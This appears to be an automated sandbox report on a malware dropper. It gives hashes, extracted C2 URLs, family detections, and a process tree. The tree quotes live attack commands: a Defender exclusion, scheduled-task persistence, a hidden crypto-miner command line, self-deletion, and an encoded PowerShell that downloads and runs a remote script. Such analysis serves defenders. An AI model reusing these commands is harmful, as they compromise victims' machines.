Resubmissions
09-09-2021 17:41
210909-v9lgtabfhq 1009-09-2021 04:26
210909-e21nrsfee3 1008-09-2021 21:37
210908-1gnpcsfbc9 1008-09-2021 21:29
210908-1bx1vafbc5 1008-09-2021 13:52
210908-q6fd6shgdj 1007-09-2021 18:07
210907-wqa3eagcgr 10Analysis
-
max time kernel
230s -
max time network
1803s -
platform
windows7_x64 -
resource
win7-en -
submitted
08-09-2021 21:37
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-en
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win10-en
General
-
Target
setup_x86_x64_install.exe
-
Size
2.9MB
-
MD5
3f1f81101d0ce95fdfac97f5913cd662
-
SHA1
8e615a64e4d72b08926242b7d73a608bdd7e9fce
-
SHA256
90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407
-
SHA512
a776c1f8636ef90d294becf8d09a45366463364026837c19e13227c1c5c9a6656b6fa525e0eec5a1a46997b6ef7066e958c02523a7c4538d046f8b2091145285
Malware Config
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
vidar
40.5
706
https://gheorghip.tumblr.com/
-
profile_id
706
Extracted
vidar
40.5
916
https://gheorghip.tumblr.com/
-
profile_id
916
Extracted
metasploit
windows/single_exec
Extracted
vidar
40.5
313
https://gheorghip.tumblr.com/
-
profile_id
313
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Glupteba Payload 1 IoCs
resource yara_rule behavioral1/memory/1440-285-0x0000000000400000-0x0000000002575000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2124 776 rundll32.exe 52 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1128 776 rundll32.exe 52 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
resource yara_rule behavioral1/memory/2968-272-0x0000000003120000-0x00000000058D2000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 5 IoCs
resource yara_rule behavioral1/files/0x0001000000012f21-125.dat family_socelars behavioral1/files/0x0001000000012f21-154.dat family_socelars behavioral1/files/0x0001000000012f21-148.dat family_socelars behavioral1/files/0x0001000000012f21-163.dat family_socelars behavioral1/files/0x0001000000012f21-162.dat family_socelars -
resource yara_rule behavioral1/files/0x0001000000012f25-118.dat redline -
Vidar Stealer 3 IoCs
resource yara_rule behavioral1/memory/2732-223-0x0000000000400000-0x0000000002BB2000-memory.dmp family_vidar behavioral1/memory/2968-273-0x0000000000400000-0x0000000002BB2000-memory.dmp family_vidar behavioral1/memory/3256-389-0x0000000000400000-0x0000000000666000-memory.dmp family_vidar -
resource yara_rule behavioral1/files/0x0001000000012f19-69.dat aspack_v212_v242 behavioral1/files/0x0001000000012f19-70.dat aspack_v212_v242 behavioral1/files/0x0002000000012f13-71.dat aspack_v212_v242 behavioral1/files/0x0002000000012f13-72.dat aspack_v212_v242 behavioral1/files/0x0001000000012f1b-75.dat aspack_v212_v242 behavioral1/files/0x0001000000012f1b-76.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
pid Process 1760 setup_installer.exe 1576 setup_install.exe 1708 Tue11d7385a978cc.exe 1100 Tue11f251db82fb7b.exe 1080 Tue11b9d76a96506.exe 1600 Tue11bc0507b56295.exe 584 Tue1109eec571ac.exe 1172 Tue11141271fbe5877f.exe 1292 Tue11b9d76a96506.tmp 436 Tue118f55232e4.exe -
Loads dropped DLL 35 IoCs
pid Process 1664 setup_x86_x64_install.exe 1760 setup_installer.exe 1760 setup_installer.exe 1760 setup_installer.exe 1760 setup_installer.exe 1760 setup_installer.exe 1760 setup_installer.exe 1576 setup_install.exe 1576 setup_install.exe 1576 setup_install.exe 1576 setup_install.exe 1576 setup_install.exe 1576 setup_install.exe 1576 setup_install.exe 1576 setup_install.exe 1388 cmd.exe 1708 Tue11d7385a978cc.exe 1708 Tue11d7385a978cc.exe 1420 cmd.exe 596 cmd.exe 760 cmd.exe 760 cmd.exe 1036 cmd.exe 1036 cmd.exe 1744 cmd.exe 1080 Tue11b9d76a96506.exe 1080 Tue11b9d76a96506.exe 1080 Tue11b9d76a96506.exe 1632 cmd.exe 1600 Tue11bc0507b56295.exe 1600 Tue11bc0507b56295.exe 584 Tue1109eec571ac.exe 584 Tue1109eec571ac.exe 436 UltraMediaBurner.exe 436 UltraMediaBurner.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 3240 icacls.exe -
resource yara_rule behavioral1/memory/2420-204-0x0000000001310000-0x0000000001311000-memory.dmp themida -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 232 api.2ip.ua 306 api.2ip.ua 55 ip-api.com 231 api.2ip.ua -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 5 IoCs
pid pid_target Process procid_target 3016 2732 WerFault.exe 72 1112 2220 WerFault.exe 58 2704 672 WerFault.exe 96 4024 2992 WerFault.exe 121 4796 4260 WerFault.exe 209 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue11bc0507b56295.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue11bc0507b56295.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue11bc0507b56295.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 956 schtasks.exe 1936 schtasks.exe 3084 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 984 timeout.exe 2152 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 2304 taskkill.exe 3928 taskkill.exe 2296 taskkill.exe 2408 taskkill.exe 1892 taskkill.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 9 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 1600 Tue11bc0507b56295.exe 1600 Tue11bc0507b56295.exe 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1600 Tue11bc0507b56295.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeCreateTokenPrivilege 436 UltraMediaBurner.exe Token: SeAssignPrimaryTokenPrivilege 436 UltraMediaBurner.exe Token: SeLockMemoryPrivilege 436 UltraMediaBurner.exe Token: SeIncreaseQuotaPrivilege 436 UltraMediaBurner.exe Token: SeMachineAccountPrivilege 436 UltraMediaBurner.exe Token: SeTcbPrivilege 436 UltraMediaBurner.exe Token: SeSecurityPrivilege 436 UltraMediaBurner.exe Token: SeTakeOwnershipPrivilege 436 UltraMediaBurner.exe Token: SeLoadDriverPrivilege 436 UltraMediaBurner.exe Token: SeSystemProfilePrivilege 436 UltraMediaBurner.exe Token: SeSystemtimePrivilege 436 UltraMediaBurner.exe Token: SeProfSingleProcessPrivilege 436 UltraMediaBurner.exe Token: SeIncBasePriorityPrivilege 436 UltraMediaBurner.exe Token: SeCreatePagefilePrivilege 436 UltraMediaBurner.exe Token: SeCreatePermanentPrivilege 436 UltraMediaBurner.exe Token: SeBackupPrivilege 436 UltraMediaBurner.exe Token: SeRestorePrivilege 436 UltraMediaBurner.exe Token: SeShutdownPrivilege 436 UltraMediaBurner.exe Token: SeDebugPrivilege 436 UltraMediaBurner.exe Token: SeAuditPrivilege 436 UltraMediaBurner.exe Token: SeSystemEnvironmentPrivilege 436 UltraMediaBurner.exe Token: SeChangeNotifyPrivilege 436 UltraMediaBurner.exe Token: SeRemoteShutdownPrivilege 436 UltraMediaBurner.exe Token: SeUndockPrivilege 436 UltraMediaBurner.exe Token: SeSyncAgentPrivilege 436 UltraMediaBurner.exe Token: SeEnableDelegationPrivilege 436 UltraMediaBurner.exe Token: SeManageVolumePrivilege 436 UltraMediaBurner.exe Token: SeImpersonatePrivilege 436 UltraMediaBurner.exe Token: SeCreateGlobalPrivilege 436 UltraMediaBurner.exe Token: 31 436 UltraMediaBurner.exe Token: 32 436 UltraMediaBurner.exe Token: 33 436 UltraMediaBurner.exe Token: 34 436 UltraMediaBurner.exe Token: 35 436 UltraMediaBurner.exe -
Suspicious use of FindShellTrayWindow 14 IoCs
pid Process 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found -
Suspicious use of SendNotifyMessage 14 IoCs
pid Process 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1664 wrote to memory of 1760 1664 setup_x86_x64_install.exe 26 PID 1664 wrote to memory of 1760 1664 setup_x86_x64_install.exe 26 PID 1664 wrote to memory of 1760 1664 setup_x86_x64_install.exe 26 PID 1664 wrote to memory of 1760 1664 setup_x86_x64_install.exe 26 PID 1664 wrote to memory of 1760 1664 setup_x86_x64_install.exe 26 PID 1664 wrote to memory of 1760 1664 setup_x86_x64_install.exe 26 PID 1664 wrote to memory of 1760 1664 setup_x86_x64_install.exe 26 PID 1760 wrote to memory of 1576 1760 setup_installer.exe 31 PID 1760 wrote to memory of 1576 1760 setup_installer.exe 31 PID 1760 wrote to memory of 1576 1760 setup_installer.exe 31 PID 1760 wrote to memory of 1576 1760 setup_installer.exe 31 PID 1760 wrote to memory of 1576 1760 setup_installer.exe 31 PID 1760 wrote to memory of 1576 1760 setup_installer.exe 31 PID 1760 wrote to memory of 1576 1760 setup_installer.exe 31 PID 1576 wrote to memory of 832 1576 setup_install.exe 33 PID 1576 wrote to memory of 832 1576 setup_install.exe 33 PID 1576 wrote to memory of 832 1576 setup_install.exe 33 PID 1576 wrote to memory of 832 1576 setup_install.exe 33 PID 1576 wrote to memory of 832 1576 setup_install.exe 33 PID 1576 wrote to memory of 832 1576 setup_install.exe 33 PID 1576 wrote to memory of 832 1576 setup_install.exe 33 PID 1576 wrote to memory of 1388 1576 setup_install.exe 34 PID 1576 wrote to memory of 1388 1576 setup_install.exe 34 PID 1576 wrote to memory of 1388 1576 setup_install.exe 34 PID 1576 wrote to memory of 1388 1576 setup_install.exe 34 PID 1576 wrote to memory of 1388 1576 setup_install.exe 34 PID 1576 wrote to memory of 1388 1576 setup_install.exe 34 PID 1576 wrote to memory of 1388 1576 setup_install.exe 34 PID 1576 wrote to memory of 596 1576 setup_install.exe 35 PID 1576 wrote to memory of 596 1576 setup_install.exe 35 PID 1576 wrote to memory of 596 1576 setup_install.exe 35 PID 1576 wrote to memory of 596 1576 setup_install.exe 35 PID 1576 wrote to memory of 596 1576 setup_install.exe 35 PID 1576 wrote to memory of 596 1576 setup_install.exe 35 PID 1576 wrote to memory of 596 1576 setup_install.exe 35 PID 1576 wrote to memory of 1420 1576 setup_install.exe 36 PID 1576 wrote to memory of 1420 1576 setup_install.exe 36 PID 1576 wrote to memory of 1420 1576 setup_install.exe 36 PID 1576 wrote to memory of 1420 1576 setup_install.exe 36 PID 1576 wrote to memory of 1420 1576 setup_install.exe 36 PID 1576 wrote to memory of 1420 1576 setup_install.exe 36 PID 1576 wrote to memory of 1420 1576 setup_install.exe 36 PID 1576 wrote to memory of 1036 1576 setup_install.exe 37 PID 1576 wrote to memory of 1036 1576 setup_install.exe 37 PID 1576 wrote to memory of 1036 1576 setup_install.exe 37 PID 1576 wrote to memory of 1036 1576 setup_install.exe 37 PID 1576 wrote to memory of 1036 1576 setup_install.exe 37 PID 1576 wrote to memory of 1036 1576 setup_install.exe 37 PID 1576 wrote to memory of 1036 1576 setup_install.exe 37 PID 1388 wrote to memory of 1708 1388 cmd.exe 50 PID 1388 wrote to memory of 1708 1388 cmd.exe 50 PID 1388 wrote to memory of 1708 1388 cmd.exe 50 PID 1388 wrote to memory of 1708 1388 cmd.exe 50 PID 1388 wrote to memory of 1708 1388 cmd.exe 50 PID 1388 wrote to memory of 1708 1388 cmd.exe 50 PID 1388 wrote to memory of 1708 1388 cmd.exe 50 PID 1576 wrote to memory of 760 1576 setup_install.exe 38 PID 1576 wrote to memory of 760 1576 setup_install.exe 38 PID 1576 wrote to memory of 760 1576 setup_install.exe 38 PID 1576 wrote to memory of 760 1576 setup_install.exe 38 PID 1576 wrote to memory of 760 1576 setup_install.exe 38 PID 1576 wrote to memory of 760 1576 setup_install.exe 38 PID 1576 wrote to memory of 760 1576 setup_install.exe 38 PID 1420 wrote to memory of 1100 1420 cmd.exe 49
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:832
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:2676
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11d7385a978cc.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11d7385a978cc.exeTue11d7385a978cc.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1708
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11b9d76a96506.exe4⤵
- Loads dropped DLL
PID:596 -
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11b9d76a96506.exeTue11b9d76a96506.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1080 -
C:\Users\Admin\AppData\Local\Temp\is-VKUN0.tmp\Tue11b9d76a96506.tmp"C:\Users\Admin\AppData\Local\Temp\is-VKUN0.tmp\Tue11b9d76a96506.tmp" /SL5="$40130,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11b9d76a96506.exe"6⤵
- Executes dropped EXE
PID:1292 -
C:\Users\Admin\AppData\Local\Temp\is-N7BH1.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-N7BH1.tmp\46807GHF____.exe" /S /UID=burnerch27⤵PID:2840
-
C:\Program Files\DVD Maker\QTYZPJDXTD\ultramediaburner.exe"C:\Program Files\DVD Maker\QTYZPJDXTD\ultramediaburner.exe" /VERYSILENT8⤵PID:2088
-
C:\Users\Admin\AppData\Local\Temp\is-UBRE5.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-UBRE5.tmp\ultramediaburner.tmp" /SL5="$E015E,281924,62464,C:\Program Files\DVD Maker\QTYZPJDXTD\ultramediaburner.exe" /VERYSILENT9⤵PID:2960
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:436
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a9-aa1b6-de6-bbbb2-5d397d83e3f54\Bilaeforiga.exe"C:\Users\Admin\AppData\Local\Temp\a9-aa1b6-de6-bbbb2-5d397d83e3f54\Bilaeforiga.exe"8⤵PID:696
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵PID:2328
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2328 CREDAT:275457 /prefetch:210⤵PID:3060
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ea-56a15-09a-7029b-7718ca6a87758\Fakytadyshu.exe"C:\Users\Admin\AppData\Local\Temp\ea-56a15-09a-7029b-7718ca6a87758\Fakytadyshu.exe"8⤵PID:2764
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o2gsypwa.u5q\GcleanerEU.exe /eufive & exit9⤵PID:4004
-
C:\Users\Admin\AppData\Local\Temp\o2gsypwa.u5q\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\o2gsypwa.u5q\GcleanerEU.exe /eufive10⤵PID:3728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3sm1glrh.zup\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:1892
-
C:\Users\Admin\AppData\Local\Temp\3sm1glrh.zup\installer.exeC:\Users\Admin\AppData\Local\Temp\3sm1glrh.zup\installer.exe /qn CAMPAIGN="654"10⤵PID:2312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qxz3ejwk.drm\anyname.exe & exit9⤵PID:2800
-
C:\Users\Admin\AppData\Local\Temp\qxz3ejwk.drm\anyname.exeC:\Users\Admin\AppData\Local\Temp\qxz3ejwk.drm\anyname.exe10⤵PID:4084
-
C:\Users\Admin\AppData\Local\Temp\qxz3ejwk.drm\anyname.exe"C:\Users\Admin\AppData\Local\Temp\qxz3ejwk.drm\anyname.exe" -u11⤵PID:904
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x1mqwwnc.b1o\gcleaner.exe /mixfive & exit9⤵PID:4104
-
C:\Users\Admin\AppData\Local\Temp\x1mqwwnc.b1o\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\x1mqwwnc.b1o\gcleaner.exe /mixfive10⤵PID:4280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5b5tm1tk.nnz\autosubplayer.exe /S & exit9⤵PID:4228
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11f251db82fb7b.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11f251db82fb7b.exeTue11f251db82fb7b.exe5⤵
- Executes dropped EXE
PID:1100 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:2108
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:2892
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:3008
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:956
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:2944
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:1472
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:3084
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:1604
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:3088
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵PID:2936
-
C:\Users\Admin\AppData\Roaming\3608005.exe"C:\Users\Admin\AppData\Roaming\3608005.exe"8⤵PID:672
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 672 -s 17529⤵
- Program crash
PID:2704
-
-
-
C:\Users\Admin\AppData\Roaming\7511607.exe"C:\Users\Admin\AppData\Roaming\7511607.exe"8⤵PID:616
-
-
C:\Users\Admin\AppData\Roaming\1065201.exe"C:\Users\Admin\AppData\Roaming\1065201.exe"8⤵PID:2748
-
-
C:\Users\Admin\AppData\Roaming\6424618.exe"C:\Users\Admin\AppData\Roaming\6424618.exe"8⤵PID:1940
-
-
C:\Users\Admin\AppData\Roaming\3444572.exe"C:\Users\Admin\AppData\Roaming\3444572.exe"8⤵PID:2992
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2992 -s 17929⤵
- Program crash
PID:4024
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe"C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe"7⤵PID:2968
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Alfanewfile2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe" & del C:\ProgramData\*.dll & exit8⤵PID:1420
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Alfanewfile2.exe /f9⤵
- Kills process with taskkill
PID:2304
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
PID:984
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵PID:3000
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵PID:1440
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"9⤵PID:4316
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵PID:2084
-
C:\Users\Admin\AppData\Local\Temp\is-U00ER.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-U00ER.tmp\setup_2.tmp" /SL5="$B015E,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵PID:2208
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵PID:2484
-
C:\Users\Admin\AppData\Local\Temp\is-NFKTQ.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-NFKTQ.tmp\setup_2.tmp" /SL5="$201BC,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵PID:528
-
C:\Users\Admin\AppData\Local\Temp\is-NMV64.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-NMV64.tmp\postback.exe" ss111⤵PID:2416
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss112⤵PID:3004
-
C:\Users\Admin\AppData\Local\Temp\ohao6KhzB.exe"C:\Users\Admin\AppData\Local\Temp\ohao6KhzB.exe"13⤵PID:1372
-
C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"14⤵PID:2348
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\15⤵PID:1864
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\16⤵PID:2780
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe" /F15⤵
- Creates scheduled task(s)
PID:1936
-
-
C:\Users\Admin\AppData\Local\Temp\vildo2\vildo2.exe"C:\Users\Admin\AppData\Local\Temp\vildo2.\vildo2.exe"15⤵PID:3256
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im vildo2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\vildo2.\vildo2.exe" & del C:\ProgramData\*.dll & exit16⤵PID:3896
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im vildo2.exe /f17⤵
- Kills process with taskkill
PID:3928
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 617⤵
- Delays execution with timeout.exe
PID:2152
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ProgramData\denverapp.\denverapp.cmd" "15⤵PID:4076
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -w h -enc IAAkAGEAPQBpAHcAcgAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA2ADEALgAxADMANwAuADEANwAyAC8AeQByAGQALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABBAHIAcwBpAG4AZwAgAHwAaQBlAHgA16⤵PID:3152
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:3068
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:2796
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
PID:1892
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵PID:1100
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵PID:2320
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵PID:2336
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵PID:2556
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1109eec571ac.exe /mixone4⤵
- Loads dropped DLL
PID:1036 -
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue1109eec571ac.exeTue1109eec571ac.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:584 -
